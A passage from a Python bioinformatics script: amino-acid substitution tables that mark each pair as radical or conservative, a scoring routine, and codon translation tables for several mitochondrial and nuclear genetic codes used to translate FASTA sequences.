("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"R",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"C",("S","L"):"C",("T","L"):"C"
,("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"C",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},6:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"R",("G","T"):"R",("G","W"):"C",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"
):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"R",("T","G"):"R",("W","G"):"C",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},7:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R
","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("
S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}}
resultsList = []
cri = 0
for scheme in aaSchemeList:
currScheme = aaSchemeDict[scheme]
currValue = currScheme[(aaList[0],aaList[1])]
if currValue == 'R':
cri += 1
resultsList.append(1)
else:
resultsList.append(0)
cri = cri/7.0
resultsList.append(cri)
return resultsList
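# buildCodonDict: read a FASTA file, split each sequence into in-frame codons,
# and translate them (invertebrate mitochondrial code) as a sanity check.
# Returns the raw sequences, their order, and the per-sequence codon lists.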
def buildCodonDict(fasta):
code = 'invertebrateMt'
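# Codon -> amino acid tables for several NCBI-style translation codes; '*' marks
# stop codons. Only the table named by `code` above is actually used.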
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 
'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 